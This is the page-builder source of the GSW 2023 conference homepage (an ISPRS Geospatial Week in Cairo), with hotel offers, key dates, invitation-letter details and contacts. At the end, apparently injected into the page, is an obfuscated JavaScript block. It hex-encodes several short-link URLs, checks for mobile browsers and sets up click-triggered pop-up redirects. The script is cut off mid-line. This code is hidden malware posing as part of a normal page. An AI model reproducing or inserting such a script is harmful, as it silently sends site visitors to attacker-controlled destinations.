wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1690251156587{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><img class=\"alignnone wp-image-5041 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></h4>\n<p style=\"text-align: center;\">Email : gsw2023@funtrip-travel.com</p>\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const 